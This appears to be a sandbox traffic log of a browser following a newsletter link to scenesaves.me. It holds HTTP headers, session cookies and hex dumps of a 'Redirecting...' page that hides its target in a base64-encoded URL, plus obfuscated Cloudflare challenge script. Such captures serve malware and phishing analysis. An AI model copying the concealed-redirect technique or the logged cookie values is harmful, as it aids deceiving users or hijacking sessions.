                                                                                                                                                                                                                                Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                X-Server-Powered-By: Engintron
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AteB6yRmERVhOvwBnWeSPOaKleWNZqHE7vwjYAqv9Wfx%2F5aJluHYdbmhFMoBZhHbTK%2FA99Cwc193%2FwEY%2BzfFUXP%2BCO2pBWduhZt3TnA%2FIEcEpCL9a%2FSrVvA6VILiA00v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7946ef1de95-EWR


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.44975735.190.80.14432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:01 UTC526OUTOPTIONS /report/v4?s=ktAMqGitfUBe8gRXfL9e3tsYjDa3516GbHwyruZjhLkjVgSZK22QHoLrSfZeGzpGVksVvRWdfj3gMwCpOF61NEaHoFsofZ%2FBinYIPQ%2BtHpdS7UXwZDHmEsM3P8mbnUjd HTTP/1.1
                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Origin: https://scenesaves.me
                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:01 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 20:57:00 GMT
                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.449759188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:01 UTC1258OUTGET /?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team HTTP/1.1
                                                                                                                                                                                                                                Host: scenesaves.me
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                Referer: https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
                                                                                                                                                                                                                                2024-10-03 20:57:02 UTC845INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:02 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                Last-Modified: Tue, 01 Oct 2024 08:27:16 GMT
                                                                                                                                                                                                                                X-Nginx-Upstream-Cache-Status: EXPIRED
                                                                                                                                                                                                                                X-Server-Powered-By: Engintron
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oexcR0F%2BwoVg%2Bpa%2B%2Bjl2pOakmgZCFuK97G83g53qJiN1Hf63SwCh5zr%2BOUmOkdYyXJxTN5kTrSzZIvG2TcxMvRA1GdFkPqvfzyOyIeEohJax9R1oxpZp9di1T2Z%2BmWad"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd79aee41159f-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:02 UTC524INData Raw: 36 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 0d 0a 20 20 20 20 63 6f 6e 73 74 20 62 61 73 65 36 34 45 6e 63 6f 64 65 64 55 52 4c 20 3d 20 27 61 48 52 30 63
                                                                                                                                                                                                                                Data Ascii: 605<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Redirecting...</title> <script type="text/javascript"> const base64EncodedURL = 'aHR0c
                                                                                                                                                                                                                                2024-10-03 20:57:02 UTC1024INData Raw: 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 3c 70 3e 52 65 64 69 72 65 63 74 69 6e 67 2c 20 70 6c 65 61 73 65 20 77 61 69 74 2e 2e 2e 3c 2f 70 3e 0d 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 63 63 66 64 37 39 61 65 65 34 31 31 35 39 66 27 2c 74 3a 27 4d 54 63 79 4e 7a
                                                                                                                                                                                                                                Data Ascii: </script></head><body> <p>Redirecting, please wait...</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ccfd79aee41159f',t:'MTcyNz
                                                                                                                                                                                                                                2024-10-03 20:57:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.2.44976135.190.80.14432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:01 UTC470OUTPOST /report/v4?s=ktAMqGitfUBe8gRXfL9e3tsYjDa3516GbHwyruZjhLkjVgSZK22QHoLrSfZeGzpGVksVvRWdfj3gMwCpOF61NEaHoFsofZ%2FBinYIPQ%2BtHpdS7UXwZDHmEsM3P8mbnUjd HTTP/1.1
                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 500
                                                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:01 UTC500OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 31 31 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 2e 73 62 73 74 63 6b 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22
                                                                                                                                                                                                                                Data Ascii: [{"age":0,"body":{"elapsed_time":2116,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://link.sbstck.com/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":503,"type":"http.error"},"type":"network-error","url":"
                                                                                                                                                                                                                                2024-10-03 20:57:01 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 20:57:01 GMT
                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                12192.168.2.449762188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:02 UTC783OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                                                                                                                                Host: scenesaves.me
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y
                                                                                                                                                                                                                                2024-10-03 20:57:02 UTC663INHTTP/1.1 302 Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:02 GMT
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?
                                                                                                                                                                                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAFAOOBSqzrouRSmg2wUpASvaViRj9JLMBYEErJRP1l0tKj8ekdZLKRkH38PD6KPQO%2BoZeeB715%2B3L0lusLQlyjcfEKYQvq0r%2BSPNXCDGiVX3TysPnyoP8JTwaaBwBP8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd79e2cf80cbc-EWR


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                13192.168.2.449767188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC938OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1
                                                                                                                                                                                                                                Host: scenesaves.me
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:03 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 7958
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nP81sFJXrtv4d1nzg8DMKCq4Xm4B7dQGkG9qZs%2FQYTiCpTp1JuXPUirBp0pWMLL7GSISEtcxgs%2FJIBQi4nyG9ZhxuH07%2Bs%2Fx5ODxWAplUqvwh5n14BuCbuqC2hqbP6Y4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7a4de275e66-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC725INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 66 2c 67 2c 6c 2c 6d 2c 6e 2c 78 2c 79 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 55 2c 42 2c 43 29 7b 66 6f 72 28 55 3d 62 2c 42 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 43 3d 70 61 72 73 65 49 6e 74 28 55 28 35 30 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 35 34 32 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 55 28 35 35 39 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 55 28 34 36 39 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 39 34 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 35 33 37 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 39 35 29 29 2f 37 2b 2d 70 61
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,f,g,l,m,n,x,y){V=b,function(c,d,U,B,C){for(U=b,B=c();!![];)try{if(C=parseInt(U(507))/1+-parseInt(U(542))/2*(parseInt(U(559))/3)+parseInt(U(469))/4+-parseInt(U(494))/5*(-parseInt(U(537))/6)+-parseInt(U(495))/7+-pa
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC1369INData Raw: 28 35 34 38 29 5d 28 48 2c 52 29 7c 7c 28 48 5b 52 5d 3d 4c 2b 2b 2c 49 5b 52 5d 3d 21 30 29 2c 53 3d 4a 2b 52 2c 4f 62 6a 65 63 74 5b 61 32 28 35 34 34 29 5d 5b 61 32 28 35 35 37 29 5d 5b 61 32 28 35 34 38 29 5d 28 48 2c 53 29 29 4a 3d 53 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 32 28 35 34 34 29 5d 5b 61 32 28 35 35 37 29 5d 5b 61 32 28 35 34 38 29 5d 28 49 2c 4a 29 29 7b 69 66 28 32 35 36 3e 4a 5b 61 32 28 35 34 35 29 5d 28 30 29 29 7b 66 6f 72 28 47 3d 30 3b 47 3c 4d 3b 4f 3c 3c 3d 31 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 32 28 35 33 31 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 32 28 35 34 35 29 5d 28 30 29 2c 47 3d 30 3b 38 3e 47 3b 4f 3d 54 26 31 7c 4f 3c 3c 31 2c 45 2d 31 3d
                                                                                                                                                                                                                                Data Ascii: (548)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(544)][a2(557)][a2(548)](H,S))J=S;else{if(Object[a2(544)][a2(557)][a2(548)](I,J)){if(256>J[a2(545)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[a2(531)](F(O)),O=0):P++,G++);for(T=J[a2(545)](0),G=0;8>G;O=T&1|O<<1,E-1=
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC1369INData Raw: 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 61 33 29 7b 72 65 74 75 72 6e 20 61 33 3d 61 30 2c 44 3d 3d 6e 75 6c 6c 3f 27 27 3a 27 27 3d 3d 44 3f 6e 75 6c 6c 3a 42 2e 69 28 44 5b 61 33 28 35 35 31 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 45 2c 61 34 29 7b 72 65 74 75 72 6e 20 61 34 3d 61 33 2c 44 5b 61 34 28 35 34 35 29 5d 28 45 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 45 2c 46 2c 61 35 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 54 2c 53 29 7b 66 6f 72 28 61 35 3d 61 30 2c 47 3d 5b 5d 2c 48 3d 34 2c 49 3d 34 2c 4a 3d 33 2c 4b 3d 5b 5d 2c 4e 3d 46 28 30 29 2c 4f 3d 45 2c 50 3d 31 2c 4c 3d 30 3b 33 3e 4c 3b 47 5b 4c 5d 3d 4c 2c 4c 2b 3d 31 29 3b 66 6f 72 28 51 3d 30 2c 52 3d 4d
                                                                                                                                                                                                                                Data Ascii: '')},'j':function(D,a3){return a3=a0,D==null?'':''==D?null:B.i(D[a3(551)],32768,function(E,a4){return a4=a3,D[a4(545)](E)})},'i':function(D,E,F,a5,G,H,I,J,K,L,M,N,O,P,Q,R,T,S){for(a5=a0,G=[],H=4,I=4,J=3,K=[],N=F(0),O=E,P=1,L=0;3>L;G[L]=L,L+=1);for(Q=0,R=M
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC1369INData Raw: 61 61 3d 56 2c 6e 75 6c 6c 3d 3d 3d 43 7c 7c 76 6f 69 64 20 30 3d 3d 3d 43 29 72 65 74 75 72 6e 20 45 3b 66 6f 72 28 47 3d 76 28 43 29 2c 42 5b 61 61 28 34 38 35 29 5d 5b 61 61 28 34 39 33 29 5d 26 26 28 47 3d 47 5b 61 61 28 34 37 32 29 5d 28 42 5b 61 61 28 34 38 35 29 5d 5b 61 61 28 34 39 33 29 5d 28 43 29 29 29 2c 47 3d 42 5b 61 61 28 34 38 36 29 5d 5b 61 61 28 34 37 35 29 5d 26 26 42 5b 61 61 28 35 33 33 29 5d 3f 42 5b 61 61 28 34 38 36 29 5d 5b 61 61 28 34 37 35 29 5d 28 6e 65 77 20 42 5b 28 61 61 28 35 33 33 29 29 5d 28 47 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4d 2c 61 62 2c 4e 29 7b 66 6f 72 28 61 62 3d 61 61 2c 4d 5b 61 62 28 34 36 36 29 5d 28 29 2c 4e 3d 30 3b 4e 3c 4d 5b 61 62 28 35 35 31 29 5d 3b 4d 5b 4e 2b 31 5d 3d 3d 3d 4d 5b 4e 5d 3f 4d 5b 61
                                                                                                                                                                                                                                Data Ascii: aa=V,null===C||void 0===C)return E;for(G=v(C),B[aa(485)][aa(493)]&&(G=G[aa(472)](B[aa(485)][aa(493)](C))),G=B[aa(486)][aa(475)]&&B[aa(533)]?B[aa(486)][aa(475)](new B[(aa(533))](G)):function(M,ab,N){for(ab=aa,M[ab(466)](),N=0;N<M[ab(551)];M[N+1]===M[N]?M[a
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC1369INData Raw: 74 61 6e 63 65 6f 66 20 63 5b 61 36 28 34 36 32 29 5d 26 26 30 3c 63 5b 61 36 28 34 36 32 29 5d 5b 61 36 28 35 34 34 29 5d 5b 61 36 28 35 33 35 29 5d 5b 61 36 28 35 34 38 29 5d 28 64 29 5b 61 36 28 35 35 30 29 5d 28 61 36 28 35 30 36 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 64 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 61 64 3d 56 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 3d 67 5b 61 64 28 34 38 31 29 5d 28 61 64 28 35 34 39 29 29 2c 42 5b 61 64 28 34 35 39 29 5d 3d 61 64 28 35 34 33 29 2c 42 5b 61 64 28 34 36 33 29 5d 3d 27 2d 31 27 2c 67 5b 61 64 28 35 34 31 29 5d 5b 61 64 28 35 36 31 29 5d 28 42 29 2c 43 3d 42 5b 61 64 28 35 32 36 29 5d 2c 44 3d 7b 7d 2c 44 3d 56 67 75 79 36 28 43 2c 43 2c 27 27 2c 44 29 2c 44 3d 56 67 75 79 36 28 43 2c 43 5b 61 64 28 35 30
                                                                                                                                                                                                                                Data Ascii: tanceof c[a6(462)]&&0<c[a6(462)][a6(544)][a6(535)][a6(548)](d)[a6(550)](a6(506))}function z(ad,B,C,D,E,F){ad=V;try{return B=g[ad(481)](ad(549)),B[ad(459)]=ad(543),B[ad(463)]='-1',g[ad(541)][ad(561)](B),C=B[ad(526)],D={},D=Vguy6(C,C,'',D),D=Vguy6(C,C[ad(50
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC1369INData Raw: 28 35 33 38 29 2c 42 29 3a 28 43 3d 67 5b 61 65 28 35 31 34 29 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 67 5b 61 65 28 35 31 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 67 29 7b 61 67 3d 61 65 2c 43 28 29 2c 67 5b 61 67 28 35 30 38 29 5d 21 3d 3d 61 67 28 35 33 30 29 26 26 28 67 5b 61 67 28 35 31 34 29 5d 3d 43 2c 42 28 29 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 63 2c 61 38 2c 64 29 7b 66 6f 72 28 61 38 3d 56 2c 64 3d 5b 5d 3b 6e 75 6c 6c 21 3d 3d 63 3b 64 3d 64 5b 61 38 28 34 37 32 29 5d 28 4f 62 6a 65 63 74 5b 61 38 28 35 32 38 29 5d 28 63 29 29 2c 63 3d 4f 62 6a 65 63 74 5b 61 38 28 35 32 31 29 5d 28 63 29 29 3b 72 65 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 64 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 61 28 29 2c 62 3d 66 75
                                                                                                                                                                                                                                Data Ascii: (538),B):(C=g[ae(514)]||function(){},g[ae(514)]=function(ag){ag=ae,C(),g[ag(508)]!==ag(530)&&(g[ag(514)]=C,B())})}function v(c,a8,d){for(a8=V,d=[];null!==c;d=d[a8(472)](Object[a8(528)](c)),c=Object[a8(521)](c));return d}function b(c,d,e){return e=a(),b=fu
